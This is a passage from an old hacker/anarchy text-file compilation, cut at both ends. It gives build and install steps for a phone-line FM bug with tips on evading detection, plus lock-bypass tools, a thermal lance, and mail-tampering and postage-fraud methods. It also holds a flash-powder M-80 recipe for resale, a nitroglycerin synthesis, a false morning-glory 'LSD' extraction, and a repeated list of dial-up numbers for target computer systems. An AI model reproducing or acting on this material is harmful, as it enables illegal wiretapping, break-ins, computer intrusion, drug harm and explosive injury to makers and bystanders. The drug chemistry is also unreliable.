  2885. you need an amplifier, like a walkman with two earphone plugs. Put the first
  2886. plug on the line, and then into one of the jacks. Then turn the volume all the
  2887. way up (w/out pressing play). Next connect the second earphone plug to the mice
  2888. wires, and into the second earphone outlet on the walkman. Now put the whole
  2889. mess in the box, and lock it up. This should do the trick. It gives you a
  2890. private radio station to listen to them on: you can turn it off when something
  2891. boring comes on, and you can tape off the walkie talkie speaker that you have!
  2892.  
  2893.                       PART IV: WIRELESS TRANSMITTER PLANZ
  2894.  
  2895. This is a tiny transmitter that consists on a one colpitts oscillator that
  2896. derives it's power from the phone line. Since the resistance it puts on the
  2897. line is less than 100 ohms, it has no effect on the telephone performance, and
  2898. can not be detected by the phone company, or the tappee. Since it is a
  2899. low-powered device using no antenna for radiation, it is legal to the FCC.
  2900. (That is it complies with part 15 of the FCC rules and regulations). It,
  2901. however is still illegal to do, it's just that what you're using to do it is
  2902. legal. This is explained later in part 15... "no person shall use such a device
  2903. for eavesdropping unless authorized by all parties of the conversation" (then
  2904. it's not eavesdropping is it?). What this thing does, is use four diodes to
  2905. form a "bridge rectifier". It produces a varying dc voltage varying with the
  2906. auto-signals on the line. That voltage is used to supply the the voltage for
  2907. the oscillator transistor. Which is connected to a radio circuit. From there,
  2908. you can tune it to any channel you want. The rest will all be explained in a
  2909. minute....
  2910.  
  2911.  
  2912.  
  2913.  
  2914.   ∩7Å3 
  2915. èPARTS LIST
  2916. item                              description
  2917. -----------------------------------------------------------------
  2918. C1                   47-Pf ceramic disk capacitor
  2919. C2,C3                27-Pf mica capacitor
  2920. CR1,CR2,CR3,CR4      germanium diode 1n90 or equivalent
  2921. R1                   100 ohm, 1/4 watt 10% composition resistor
  2922. R2                   10k, 1/4 watt 10% composition resistor
  2923. R3                   .7k, 1/4 watt 10% composition resistor
  2924. L1                   2 uH radio frequency choke (see text)
  2925. L2                   5 turns No.20 wire (see text)
  2926. Q1                   Npn rf transistor 2N5179 or equivalent
  2927. -----------------------------------------------------------------
  2928.  
  2929. L1 may be constructed by winding approximately 40 turns of No. 36
  2930. enamel wire on a mega-ohm, 1/2 watt resistor. The value of L1 is
  2931. not critical. L2 can be made by wrapping 5 turns of No. 20 wire
  2932. around a 1/4 inch form. After the wire is wrapped, the form can
  2933. be removed. Just solder it into place on the circuit board. It
  2934. should hold quite nicely. Also be sure to position Q1 so that the
  2935. emitter, base, and collector are in the proper holes. The
  2936. schematic should be pretty easy to follow. Although it has an
  2937. unusual number of grounds, it still works.
  2938.  
  2939.  
  2940.  
  2941.  
  2942.                   ------------------L1----------------
  2943.                  --
  2944.             CR1 /  \ CR2              ----------------
  2945. A--------------/    \ --         ----
  2946.               \    /                         C2    L2
  2947.            CR3 \  /CR4          C1  R2    ----
  2948.       R1         --                     gnd   C3
  2949.                                ----          -----
  2950.                gnd
  2951.                                     ---------Base  collector
  2952.                                           R3     \   /
  2953. B-----------------------                          \/\ <- Q1
  2954.                                            gnd       \/
  2955.  
  2956.  
  2957.                                                     emitter(gnd)
  2958.  
  2959.  
  2960.  
  2961. The odd thing about this bug that we haven't encountered yet, is that it is put
  2962. on only one wire (either red or green) so go to the box, remove the red wire
  2963. that was ALREADY on screw #1 and attach it to wire 'A' of the bug. Then attach
  2964. wire 'B' to the screw itself. You can adjust the frequency which it comes out
  2965. on the FM channel by either smooshing, or widening the coils of L2. It takes a
  2966. few minutes to get to work right, but it is also very versatile. You can change
  2967. the frequency at will, and you can easily record off your radio.
  2968.  
  2969.                            PART FIVE: HELPFUL HINTS  ∩7Å3 
  2970. è
  2971.  
  2972. First of all, With method one, the beige box, you may notice that you can also
  2973. dial out on the phone you use. I don't recommend that you do this. If you
  2974. decide to anyway, and do something conspicuous like set up a 30 person
  2975. conference for three hours, then I suggest that you make sure the people are
  2976. either out of town or dead. In general, when you tap a line, you must be
  2977. careful. I test everything I make on my line first, then install it late at
  2978. night. I would not recommend that you leave a recorder on all day. Put it on
  2979. when you want it going, and take it off when you're done. As far as recording
  2980. goes, I think that if there is a recorder on the line it sends a sporadic beep
  2981. back to the phone co. I know that if you don't record directly off the line
  2982. (i.e off your radio) then even the most sophisticated equipment can't tell that
  2983. you're recording. Also, make sure that when you install something, the people
  2984. are NOT on the line. Installation tends to make lots of scratchy sounds, clicks
  2985. and static. It is generally a good thing to avoid. It doesn't take too much
  2986. intelligence to just make a call to the house before you go to install the
  2987. thing. If it's busy then wait a while. (This of course does not apply if you
  2988. are making a "midnight run").
  2989.  
  2990. All in all, if you use common sense, and are *VERY* careful, chances are you
  2991. won't get caught. Never think that you're unstoppable, and don't broadcast what
  2992. you're doing. Keep it to yourself, and you can have a great time.
  2993.  
  2994.  
  2995.  
  2996.  
  2997.                              Miracle Lock Picking
  2998.  
  2999.      While the basic themes of lockpicking and uninvited entry have not
  3000. changed too much in the last few years, some modern devices and techniques
  3001. HAVE appeared on the scene...
  3002.  
  3003. AUTOS
  3004.      Many older autos can still be opened by easily with a SLIM JIM type
  3005. opener (these and other auto locksmithing techniques are covered fully in the
  3006. book, IN THE STEAL OF THE NIGHT.  Look for it at the next gun-show in your
  3007. town.); however, many modern cars have built covers over the lock mechanism,
  3008. or have moved the goodies so the Slim Jim will not function...
  3009.  
  3010. So...
  3011.  
  3012. AMERICAN LOCKSMITH SERVICE
  3013. P.O. Box 26
  3014. Culver City, CA 90230
  3015.  
  3016. Carries a new and improved Slim Jim that is 30" long and only 3/4" wide so it
  3017. will both reach and slip through the new car lock covers.  Price is $5.75 plus
  3018. $2.00 postage and handling.
  3019.     General Motors cars have always been a bane to people who needed to open
  3020. them, because the sidebar locking unit they employ is very difficult to pick.
  3021. To further complicate matters, the new GM cars do employ metal shields to make
  3022. the use of a Slim Jim type instrument very difficult...
  3023.  
  3024. So...  ∩7Å3 
  3025. è
  3026. LOCK TECHNOLOGY CORP.
  3027. 685 Main St.
  3028. New Rochelle, NY 10801
  3029.  
  3030. Offers a cute little gizmo which will easily remove the lock cylinder without
  3031. harm and let you enter and/or start the vehicle.  GMC-40 sells for $56.00 plus
  3032. $2.00 postage and handling.  The best general automobile opening kit is
  3033. probably the set of lockout tools offered by:
  3034.  
  3035. STECK MFG COPR.
  3036. 1319 W Stewart St.
  3037. Dayton, OH 45408
  3038.  
  3039. For $29.95 one can purchase a complete set of 6 carbon steel lockout tools
  3040. that will open 95%+ of the cars around.
  3041.  
  3042.      Kwikset locks have become quite popular as one-step-up security locks for
  3043. buildings.  They are a bit harder to pick and do offer a higher degree of
  3044. privacy than a normal, builder installed, door lock.
  3045.  
  3046. So...
  3047.  
  3048. Kwikset locks can be handily disassembled and the door opened, without harm to
  3049. either the lock or the door, by using a KIWK-OUT tool sold by:
  3050.  
  3051. A MFG
  3052. 1151 Wallace SE
  3053. Massilon, OH 44646
  3054.  
  3055. Price is $11.95, but if you are too lazy to pick auto locks...
  3056.  
  3057. VEEHOF SUPPLY
  3058. Box 361
  3059. Storm Lake, IO 50588
  3060.  
  3061. Still sells tryout keys for most cars.  Price averages about $20.00 a set.
  3062.  
  3063.  
  3064. Updated Lock Picking:
  3065.  
  3066.      For years, there have been a number of pick attack procedures for most
  3067. pin and disc tumbler lock systems.  In reverse order of ease they are:
  3068.  
  3069. Normal picking:  Using a pick set to align the pins, one by one, until the
  3070. shear line is set and lock opens.
  3071.  
  3072. Raking:  This method uses picks that are constructed wth a series of bumps, or
  3073. diamond shaped notches.  these picks are "raked", i.e., run over all pins at
  3074. one time.  With luck, the pins will raise into the open position and stay
  3075. there.  Raking, if successful, can be much less effort than standard picking
  3076. is.
  3077.  
  3078. Lock Aid Gun:  This gun shaped device was invented a number of years ago and
  3079. has found applicatin with many locksmiths and security personnel.  Basically,  ∩7Å3 
  3080. èa needle shaped pick is inserted in the snout of the "gun" and the "trigger"
  3081. is pulled.  This action snaps the pick up and down strongly.  If the tip is
  3082. slipped under the pins, they will also be snapped up and down strongly.  With
  3083. a bit of luck, they will strike each other and separate at the shear line for
  3084. a split second.  When this happens the lock will open.  The Lock Aid gun is
  3085. not 100% successful, but when it does work, the results are quite dramatic.  I
  3086. have opened locks with one snap of the trigger, impressing the hell out of
  3087. casual bystanders....
  3088.  
  3089. Vibrator:  Some crafty people have mounted a needle pick onto an electric
  3090. toothbrush power unit.  This vibrating effect will sometimes open pin tumbler
  3091. locks;  like instantly...
  3092.  
  3093.  
  3094. Technology to the rescue!
  3095.  
  3096.      There is now another method to open pin and wafer locks in a very short
  3097. time.  Although it resembles the toothbrush pick in appearance, it is actually
  3098. and electronic device.  I am speaking of the COBRA PICK.  Designed and sold
  3099. by:
  3100.  
  3101. FEDCORP
  3102. P.O. Box 569
  3103. Scottsdale, AZ 85252
  3104.  
  3105. The Cobra uses two 9-volt batteries, teflon bearings (for less noise) and a
  3106. cam-roller.  It comes with three picks (for different types of locks) and
  3107. works both in America and overseas on pin or wafer locks.  It will open common
  3108. door type locks in 3 to 7 seconds with no damage (in the hands of an
  3109. experienced locksmith).  It can take a few seconds more, or even half a minute
  3110. in the hands of someone with no experience.  How much for this toy that will
  3111. open most locks in 7 seconds?
  3112.  
  3113. $235 plus $4.50 handling.
  3114.  
  3115.  
  3116.     If none of these cute, safe and sane ideas appeal to you, you can always
  3117. fall back on the magic thermal lance...
  3118.  
  3119.  
  3120.     The thermal lance is a rather crude instrument constructed from 3/8"
  3121. hollow magnesium rods.  Each "tube" comes in a 10" length, but can be cut down
  3122. if desired.  Each one is threaded on one end.  To use the lance, you screw the
  3123. tube together with a mated regulator (like a welding outfit uses) and hook up
  3124. an oxygen tank.  the oxygen is turned on and the hollwo rod is lit with a
  3125. welding igniter.  The device produces an incredible amount of heat.  It is
  3126. used for cutting up concrete blocks or even rocks.  An active lance will go
  3127. through a foot of steel in a few seconds.
  3128.  
  3129. The lance, also known as a burning bar, is available from:
  3130.  
  3131. C.O.L. MFG
  3132. 7748 W Addison
  3133. Chicago, IL 60634
  3134.   ∩7Å3 
  3135. è
  3136.                              ====================
  3137.                              =    MAKING LSD    =
  3138.                              ====================
  3139. LSD, being of the strangest drugs, is available to people on the black
  3140. market, is not too hard to make in your average run-of-the-mill kitchen.
  3141. LSD (LySergic acid Diethylamide) is a complex organic mixture that gives
  3142. some people (most)
  3143. ================================
  3144. Making LSD: ITEMS NEEDED:
  3145.   1-About 200-250 grams of MORNIGLOR SEEDS or BAY HAWAIIAN OOD ROSE SEEDS.
  3146.    The Morning Glory Seeds can be obtained at most plant nurseries.
  3147.   2-200 cc. of petroleum ether
  3148.   3-Small piece of window screen or a strainer.
  3149.   4-A couple of large glasses.
  3150.   5-One cookie try (old on to never be used again).
  3151.   6-260 cc. of wood alcohol (call your local drug store).
  3152.   7-Capsule containers (jel)
  3153. ================================
  3154. Lets get started:
  3155.   1.  Grind up about 170 grams of Morning Glory Seeds.
  3156.   2.  In 145 cc of petroleum ether, soak the seeds for two or three days.
  3157.   3.  With screen, filter the liquid thru it and save the seed mush and allow
  3158.    it to dry completely.
  3159.   4.  Let the mush soak in 130 cc. of wood alcohol.
  3160.   5.  Filter solution again only.  Save the liquid in a large glass jar.
  3161.   6.  Soak the seed mush again in 130 cc. of wood alcohol for two more days.
  3162.   7.  Filter out the mush and keep the liquid.  Now, get the liquid that was
  3163.    saved in step 5.
  3164.   8.  Now, pour both liquids in a cookie tray and let it dry.
  3165.   9.  When all the liquid has dried, a yellowish gummy looking substance will
  3166.    appear on the cookie sheet.
  3167.   10. Take the yellow gum and put these in to capsules.
  3168. ================================
  3169. You can get the capsules just by buying something like DEXITREM or some other
  3170. pill.  Even CONTACT comes in jel capsules.  Just empty them out and
  3171. put the yellow gum in the capsules.  Allow the capsules to sit over night
  3172. for best results.
  3173.  
  3174. 1 Trip:
  3175.   34 Grams of morning glory
  3176.   18 Grams of hawaiian wood
  3177. ================================
  3178.  
  3179.  
  3180.                        How to open your own M-80 Factory
  3181.  
  3182.  
  3183.                                   **********
  3184.                                   *Supplies*
  3185.                                   **********
  3186.  
  3187. Chicago Paper Tube. Phone # 1-312-666-1404. You will be getting the paper
  3188. tubes from here. Order tubes that are 1/2" in diameter by 1 1/2" long with a
  3189. 1/16" wall with RED outer wrap.  ∩7Å3 
  3190. è
  3191. Paper Products. 1310 5th St., Tempe, AZ. 85281. Order 1/2" diameter paper end
  3192. plugs. Write to them for prices. REMEMBER:  for every 100 paper tubes you
  3193. order, you must order 200 paper end plugs.
  3194.  
  3195. Midwest Fireworks. 8550 RT. 224,Deerfield,OH. 44411.  Phone 1-800-321-2400.
  3196. Order one roll of 1/8" water proof fuse. Each M-80 needs a 2" fuse, so for
  3197. every 100 paper tubes you order, you should have 17' of water proof fuse.
  3198.  
  3199. Barium Chemicals Inc.,P.O. Box 218,County Rd. 44, Steubenville, OH. 43952.
  3200. Phone 1-614-282-9776.  Order Potassium Perchlorate. Order 2 pounds for every
  3201. 250 paper tubes you order.
  3202.  
  3203. Alcan Metal Powder Div.,P.O. Box 290, Elizabeth,NJ 07207. Phone 1-201-353-
  3204. 4600.  Order #AL-105 Aluminum Powder. Order 1 pound for every 250 paper tubes
  3205. you order.
  3206.  
  3207. Buy 1 gallon of Elmers glue from a hardware store or lumber yard.
  3208.  
  3209.                                   **********
  3210.                                   *Assembly*
  3211.                                   **********
  3212.  
  3213. 1.  Put 1 drop of glue on the inside of one end of the tube and insert the
  3214. paper end plug.
  3215.  
  3216. 2.  Punch or drill a 1/8" hole in the side of the paper tube.
  3217.  
  3218. 3.  Cut the fuse you purchased into 2" long pieces.
  3219.  
  3220. 4.  Insert the fuse into the hole in the paper tube and glue in place.
  3221.  
  3222. 5.  Scoop the paper tube with the fuse into a container of flash powder. The
  3223. paper tube should be about 2/3 full.
  3224.  
  3225. 6.  Put glue on the end plug and insert it into the paper tube filled with
  3226. flash powder.
  3227.  
  3228. 7.  The completed M-80 firecracker should dry and the glue will become hard in
  3229. 30-45 minutes.
  3230.  
  3231.                             **********************
  3232.                             *Flash Powder Formula*
  3233.                             **********************
  3234.  
  3235. Sensitive to friction and impact. High Explosive!
  3236.  
  3237. Potassium Perchlorate     2 lbs.
  3238. Aluminum Powder           1 lb.
  3239.  
  3240. There must be a 2 to 1 ratio of Potassium Perchlorate to Aluminum Powder in
  3241. order for the flash powder to be good. It must also be mixed well.
  3242.  
  3243. Suggested Price for the M-80's
  3244. You can make up your own price,but here are some prices.  ∩7Å3 
  3245. è
  3246. 2 for $1.00   11 for $5.00   24 for $10.00   50 for $20.00   100 for $40.00
  3247.  
  3248.  
  3249.  
  3250.  
  3251.                                   ============
  3252.                                   MAIL SECRETS
  3253.                                   ============
  3254.  
  3255.   There is a little secret coding or gimmickry on U.S. mail.  All U.S. postage
  3256. stamps have an invisible ink coding that flouresces in ultraviolet light.
  3257. Partly this is to detere counterfeiting of stamps.  Mostly, it is to speed up
  3258. sorting.  Canceling machines shine an ultraviolet beam on letters and check for
  3259. a glow.  Calcium silicate (which glows orange-red) and zinc orthosilicate
  3260. (which glows yellow-green) are used.  They are printed over the entire surface
  3261. of stamps or in a geometric pattern.
  3262.  
  3263.   Personal letters to the U.S. President have a secret numerical code.  The
  3264. president often gets 10,000 letters a day.  Virtually all must be opened, read,
  3265. and answered by the White House mail staff.  So that letters from friends get
  3266. to the president and family unopened, all close friends are given a sequence of
  3267. numbers to write on the outside of the envelope.  The code changes with each
  3268. president.  Ronald Reagan's code was described as a number with a special
  3269. meaning to Reagan and his wife.  Jimmy Carter used an old phone number of
  3270. Rosalynn's.
  3271.  
  3272. ---------
  3273. WAX SEALS
  3274. ---------
  3275.  
  3276.   Wax seals are not a guarantee against unauthorized opening of a letter.
  3277. According to the CIA Flaps and Seals Manual, edited by John M. Harrison
  3278. (Boulder, Colo.:  Paladin Press, 1975), there is a way to remove and replace
  3279. seals.
  3280.  
  3281.   First the opener takes a plaster-of-paris cast of the seal.  This is set
  3282. aside to harden.  The wax is gently heated with an infrared lamp.  When soft,
  3283. it is rolled into a ball and set aside.  The flap of the envelope is steamed
  3284. open, and the letter is taken outand photocopied.
  3285.  
  3286.   After the envelope's contents and replaced and the flap resealed, the same
  3287. wax is used to re-create the seal.  It is heated till pliable and pressed back
  3288. into shape with the plaster-of-paris mold.
  3289.  
  3290.   One type of seal is secure, even according to CIA Flaps And Seals Manual:
  3291. one made of two or more colors of wax melted together.  The colors inevitably
  3292. come out different on the second, surreptitious pressing.  But a color Polaroid
  3293. of the seal must be sent under seperate cover so that the letter's recipient
  3294. can compare it wiht the seal on the message letter.
  3295.  
  3296.   None of the common seals are reliable against unauthorized opening, assuming
  3297. that knowledgeable letter-openers may want to open your mail.  Scoth tape
  3298. across the flap of an envelpoe come of cleany with carbon tetrachloride
  3299. (applied with a brush or a hypodermic needle).  If you suspect that someone is  ∩7Å3 
  3300. èopening your mail, the manual suggests sending yourself a letter containing a
  3301. sheet of carbon or wax paper.  The heat and mechanical treatment of the letter
  3302. opening will smudge the carbon and melt the wax.  Otherwise, you have to
  3303. examine letters carefully to detect prior opening.  A torn flap, smudging of
  3304. the flap glue, flattened ridges in the flap, or concave (from the back) curling
  3305. due to steaming are evidence of opening.
  3306.  
  3307.   A more sophisticated test requires steaming part of the envelope near the
  3308. flap for fifteen seconds.  Then place the envelope under an ultraviolet lamp.
  3309. If there is a difference in flourescence between the steamed and the unsteamed
  3310. part of the envelope, then the envelope paper is suitable for the test.  If so,
  3311. examine the unsteamed part of the flap under the ultraviolet lamp.  If it shows
  3312. a different flourescence than the other unsteamed parts of the envelope, it
  3313. indicates that the flap may have been previously steamed.
  3314.  
  3315.   The ultraviolet lamp is also useful in detecting invisible writing.  An
  3316. effective ultraviolet ink need not flouresce brightly, as the silicate stamps
  3317. inks do.  Any substance that changes the flourescence of paper in ultraviolet
  3318. light yet is invisible in ordinary light will work.  Prisoners have used human
  3319. urine as an invisible ink (not hard to get, ehh?).  Salt water, vinegar, milk,
  3320. fruit juices, saliva, and water solutions of soap or drugs also work, with
  3321. varying degrees of legibility.
  3322.  
  3323.  
  3324. ---------------------------
  3325. HOW TO MAIL WITHOUT A STAMP
  3326. ---------------------------
  3327.  
  3328.   Postal chiselers used to mail letters unstamped in the knowledge that they
  3329. would be delievered anyway--postage due to the recipient.  It took a niggardly
  3330. person to mail personal letters this way, but many people did it on bill
  3331. payments.  So the post office changed its policy.  It stopped delivering
  3332. letters without stamps.  A letter with a stamp--even a one-cent stamp--is
  3333. delivered (postage due if need be).  A letter with no stamp is returned to the
  3334. sender.
  3335.  
  3336.   Naturally, this had just opened up a new way of cheating.  Letters can now be
  3337. maileed for free by switching the positions of the delivery address and the
  3338. return address.  If there is no stamp on the envelope, it will be "returned"--
  3339. that is, delivered to the address in the upper left corner--which is where the
  3340. sender wanted it to go in the first place.  Unlike under the old system, the
  3341. letter is not postage-due.  At most the recipient gets a stamped purple
  3342. reminder that "the post office does not deliver mail without postage."
  3343.  
  3344.   At least one large company seems to have adapted this principle to its
  3345. billing.  Citibank bases its MasterCard operations in Sioux Falls, South
  3346. Dakota.  The bill payment envelopes have the Citibank Sioux Falls address in
  3347. both the delivery address and the return address positions.  (Most bill payment
  3348. envelopes have three lines for the customer to write in his return address.)
  3349. Therefore, regardless of whether the customer puts a stamp on the envelope, it
  3350. is delivered to Citibank.  (The return-address gimmick works even when the
  3351. return address is in a different state from the mailing point.)
  3352.  
  3353.   Who is cheating whom?  If the customer puts the correct postage on the
  3354. envelope, it is delivered to Sioux Falls at customer expense.  No one is  ∩7Å3 
  3355. èslighted.  If, on the other hand, the customer intentionally omits the stamp,
  3356. the payment is delivered at the post office expense.  Then the customer has
  3357. cheated the post office.  The post office also loses out if the customer
  3358. honestly forgets to put a stamp on the envelope.  But the blame ought to be
  3359. shared with the peculiar design of Citibank's envelope.
  3360.  
  3361.   Citibank's motive is plain:  If payment envelopes are returned to forgetful
  3362. customers, it delays payment.
  3363.  
  3364.  
  3365.  
  3366.  
  3367.                          **** MAINFRAMES & MISC. ****
  3368.  
  3369.  
  3370.      THE FOLLOWING IS A LIST OF NUMBERS I HAVE COMPILED THROUGH A PERIOD OF
  3371. TIME. NOTE THAT SOME OF THE NUMBERS LISTED ARE NOT OF MAINFRAME NATURE BUT
  3372. RATHER A SMALLER TYPE SYSTEM.
  3373.  
  3374. 312-972-7603   ARROGON NET LAB
  3375. 800-228-1111   AMERICAN EXPRESS
  3376. 215-564-6572   ATLANTIC CITY CASINO
  3377. 800-225-8456   AUTONET
  3378. 800-327-676
  3379. 313-234-5621   FTS
  3380. 213-798-2000   FTS
  3381. 202-347-3222   F.A.A.
  3382. 817-332-8491   FORTWORTH SCHOOL
  3383. 817-625-6401   GIS
  3384. 617-732-1251   HARVARD
  3385. 617-732-1802   "
  3386. 415-857-8193   HP3000
  3387. 303-232-8555   HP3000
  3388. 313-644-3840   HIGH SCHOOL
  3389. 714-962-3365   H.A.T.S.
  3390. 215-563-9213   HP3000
  3391. 512-385-4170   HP3000
  3392. 301-881-6156   HP3000
  3393. 301-881-6157   HP3000
  3394. 301-881-6158   HP3000SION
  3395. 609-734-3131   RCA/CMS
  3396. 414-476-8010   RSTS/E
  3397. 414-542-4494   "
  3398. 414-543-0789   "
  3399. 303-447-2540   "
  3400. 817-877-0548   "
  3401. 313-964-2064   SMITH & HENCHMAN
  3402. 315-423-1313   SYRACUSE DECS
  3403. 404-885-3460   SEARS CREDIT CHECK
  3404. 212-369-5114   SPENCE SCHOOL
  3405. 713-795-1200   SHELL VULCAN
  3406. 313-964-2000   SEMAT COMPUTER
  3407. 412-794-7601   SLIPPERY ROCK OIL
  3408. 800-424-9494   TELEMAIL
  3409. 714-776-4511   TRW  ∩7Å3 
  3410. è
  3411.  
  3412.      THE FOLLOWING IS A LIST OF NUMBERS I HAVE COMPILED THROUGH A PERIOD OF
  3413. TIME. NOTE THAT SOME OF THE NUMBERS LISTED ARE NOT OF MAINFRAME NATURE BUT
  3414. RATHER A SMALLER TYPE SYSTEM.
  3415.  
  3416. 312-972-7603   ARROGON NET LAB
  3417. 800-228-1111   AMERICAN EXPRESS
  3418. 215-564-6572   ATLANTIC CITY CASINO
  3419. 800-225-8456   AUTONET
  3420. 800-327-676
  3421. 313-234-5621   FTS
  3422. 213-798-2000   FTS
  3423. 202-347-3222   F.A.A.
  3424. 817-332-8491   FORTWORTH SCHOOL
  3425. 817-625-6401   GIS
  3426. 617-732-1251   HARVARD
  3427. 617-732-1802   "
  3428. 415-857-8193   HP3000
  3429. 303-232-8555   HP3000
  3430. 313-644-3840   HIGH SCHOOL
  3431. 714-962-3365   H.A.T.S.
  3432. 215-563-9213   HP3000
  3433. 512-385-4170   HP3000
  3434. 301-881-6156   HP3000
  3435. 301-881-6157   HP3000
  3436. 301-881-6158   HP3000SION
  3437. 609-734-3131   RCA/CMS
  3438. 414-476-8010   RSTS/E
  3439. 414-542-4494   "
  3440. 414-543-0789   "
  3441. 303-447-2540   "
  3442. 817-877-0548   "
  3443. 313-964-2064   SMITH & HENCHMAN
  3444. 315-423-1313   SYRACUSE DECS
  3445. 404-885-3460   SEARS CREDIT CHECK
  3446. 212-369-5114   SPENCE SCHOOL
  3447. 713-795-1200   SHELL VULCAN
  3448. 313-964-2000   SEMAT COMPUTER
  3449. 412-794-7601   SLIPPERY ROCK OIL
  3450. 800-424-9494   TELEMAIL
  3451. 714-776-4511   TRW
  3452.  
  3453.  
  3454.  
  3455.                            How to Make Nitroglycerin
  3456.  
  3457.                     CH2ONO2
  3458.                     !
  3459.   3/2 N2 + 3 CO2
  3460.                     CHONO2  ---------->
  3461.      +
  3462.                     !        Ignition
  3463.   5/2 H2O + 1/4 O2
  3464.                     CH2ONO2  ∩7Å3 
  3465. è
  3466. (How Nitro explodes--note that the byproducts are nothing but nitrogen, carbon
  3467. dioxide, water and oxygen)
  3468.  
  3469.      Nitroglycerin [heretofore Nitro] is a very high-explosive. I am not sure
  3470. who invented it but he porbably didn't-- the first preson to make it blew
  3471. himself up and his friend got the info off his notes. Well anyway, the next
  3472. best thing to nitro is TNT which is ten times harder to make but also ten
  3473. times safer to make. If you can't use common sense then don't even try to make
  3474. this stuff-- a few drops can be lethal under certain circumstances.
  3475.  
  3476.                             To make Nitro:
  3477.                             --------------
  3478.  
  3479.      Mix 100 parts fuming nitric acid(for best results it should have a
  3480. specific gravity of 50 degrees Baume') with 200 parts sulphuric acid. This is
  3481. going to be hot at first--it won't splatter if you pour the nitric into the
  3482. sulphuric but don't try it the other way around. The acid solutions together
  3483. can dissolve flesh in a matter of seconds so take the proper measures for
  3484. God's sake!!! When cool, add 38 parts glycerine as slowly as possible. Let it
  3485. trickle down the sides of the container into the acids or it won't mix
  3486. thourily and the reaction could go fast--which causes heat to ignite the
  3487. stuff. Stir with a **GLASS** rod for about 15 seconds or so then **CAREFULLY**
  3488. pour it into 20 times it's **VOLUME** of water. It will visibly precipate
  3489. immediatly. There will be twice as much Nitro as you used glycerin and it is
  3490. easy to seperate. Mix it with baking soda as soon as you have seperated it--
  3491. this helps it not to go off spontainously.
  3492.  
  3493. ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  3494.   NOTES:  Parts are by weight and the Baume' scale of specific gravity can be
  3495. found in most chem. books. You can get fuming nitric and sulfuric acid where
  3496. ever goo chemical or fertilizers are sold. It is positivly *STUPID* to make
  3497. more than 200 grams of Nitro at a time. When mixing the stuff wear goggles,
  3498. gloves, etc. When I first made the stuff I had the honor of having it go off
  3499. by itself (I added too much glycerin at a time). I was across the room at the
  3500. time, but I felt the impact-- so did the table it was on as well as the window
  3501. it was next to--they were both smashed by only 25 grams in an open bowl. Oh
  3502. yes, glycerine you can get at any pharmacy and you need an adults sigature for
  3503. the acids. Any bump can make Nitro go off if you don't add the bicarbonate of
  3504. (baking) soda-but even with that, if it gets old I wouldn't play catch with
  3505. it.
  3506.      Once you have made the Nitro and saturated it with bicarb. you can make a
  3507. really powerful explosive that won't go off by itself by simply mixing it with
  3508. as much cotton as you can add and then saturating it that with molten
  3509. parifine--just enough to make it sealed and hard. Typically use the same
  3510. amounts (by weight) of each Nitro, cotton, and parifine. This when wrapped in
  3511. newspaper, was once known as "Norbin & Ohlsson's Patent Dynamite," but that
  3512. was back in 1896.
  3513.  
  3514.  
  3515.  
  3516.  
  3517.  
  3518.  
  3519.   ∩7Å3 
  3520. èModem Noise Killer (alpha version)
  3521.  
  3522. With this circuit diagram, some basic tools including a soldering iron, and
  3523. four or five components from Radio Shack, you should be able to cut the
  3524. noise/garbage that appears on your computer's screen.
  3525.  
  3526. I started this project out of frustration at using a US Robotics 2400 baud
  3527. modem and getting a fare amount of junk when connecting at that speed. Knowing
  3528. that capacitors make good noise filters, I threw this together.
  3529.  
  3530. This is very easy to build, however conditions may be different due to modem
  3531. type, amount of line noise, old or new switching equipment (Bell's equipment),
  3532. and on and on. So it may not work as well for you in every case. If it does
  3533. work, or if you've managed to tweek it to your computer/modem setup I' d like
  3534. to hear from you.
  3535.  
  3536. I'd also appreciate any of you electronic wizzards out there wanting to offer
  3537. any improvements. Let's make this work for everyone!
  3538.  
  3539. Please read this entire message and see if you understand it before you begin.
  3540.  
  3541. OK, what you' ll need from Radio Shack:
  3542.  
  3543. 1 #279-374 Modular line cord if you don't already have one. You won't need one
  3544. if your phone has a modular plug in its base. $4.95
  3545.  
  3546. 1 #279-420 Modular surface mount jack (4 or 6 conductor) $4.49
  3547.  
  3548. 1 #271-1720 Potentiometer. This is a 5k audio taper variable resistor. $1.09
  3549.  
  3550. 1 #272-1055 Capacitor. Any non-polarized 1.0 to 1.5 uf cap should do. Paper,
  3551. Mylar, or metal film caps should be used, although #272-996 may work as well.
  3552. (272-996 is a non-polarized electrolytic cap) $.79
  3553.  
  3554. 1 100 ohm resistor - quarter or half watt. $.19
  3555.  
  3556. 1 #279-357 Y-type or duplex modular connector. Don't buy this until you've read
  3557. the section on connecting the Noise Killer below. (A, B,or C) $4.95
  3558.  
  3559. First off, open the modular block. You normally just pry them open with a
  3560. screwdriver. Inside you'll find up to 6 wires. Very carefully cut out all but
  3561. the green and red wires. The ones you'll be removing should be black, yellow,
  3562. white, and blue. These wires won't be needed and may be in the way. So cut them
  3563. as close to where they enter the plug as possible. The other end of these wires
  3564. have a spade lug connector that is screwed into the plastic. Unscrew and remove
  3565. that end of the wires as well. Now, you should have two wires left. Green and
  3566. red. Solder one end of the capacitor to the green wire. Solder the other end of
  3567. the capacitor to the center lug of the potentiometer (there are three lugs on
  3568. this critter). Solder one end of the resistor to the red wire. You may want to
  3569. shorten the leads of the resistor first. Solder the other end of the resistor
  3570. to either one of the remaining outside lugs of the potentiometer. Doesn't
  3571. matter which. Now to wrap it up, make a hole in the lid of the mod block to
  3572. stick the shaft of the potentiometer through. Don't make this hole dead center
  3573. as the other parts may not fit into the body of the mod block if you do. See
  3574. how things will fit in order to find where the hole will go. Well, now that  ∩7Å3 
  3575. èyou've got it built you'll need to test it. First twist the shaft on the
  3576. potentiometer until it stops. You won't know which way to turn it until later.
  3577. It doesn't matter which way now. You also need to determine where to plug the
  3578. Noise Killer onto the telephone line. It can be done by one of several ways:
  3579.  
  3580. A. If your modem has two modular plugs in back, connect the Noise Killer into
  3581. one of them using a line cord. (a line cord is a straight cord that connects a
  3582. phone to the wall outlet. Usually silver in color)
  3583.  
  3584. B. If your phone is modular, you can unplug the cord from the back of it after
  3585. you're on-line and plug the cord into the Noise Killer.
  3586.  
  3587. C. You may have to buy a Y-type modular adaptor. Plug the adaptor into a wall
  3588. outlet, plug the modem into one side and the Noise Killer into the other. Call
  3589. a BBS that has known noise problems. After you've connected and garbage begins
  3590. to appear, plug the Noise Killer into the phone line as described above. If you
  3591. have turned the shaft on the potentiometer the wrong way you'll find out now.
  3592. You may get a lot of garbage or even disconnected. If this happens, turn the
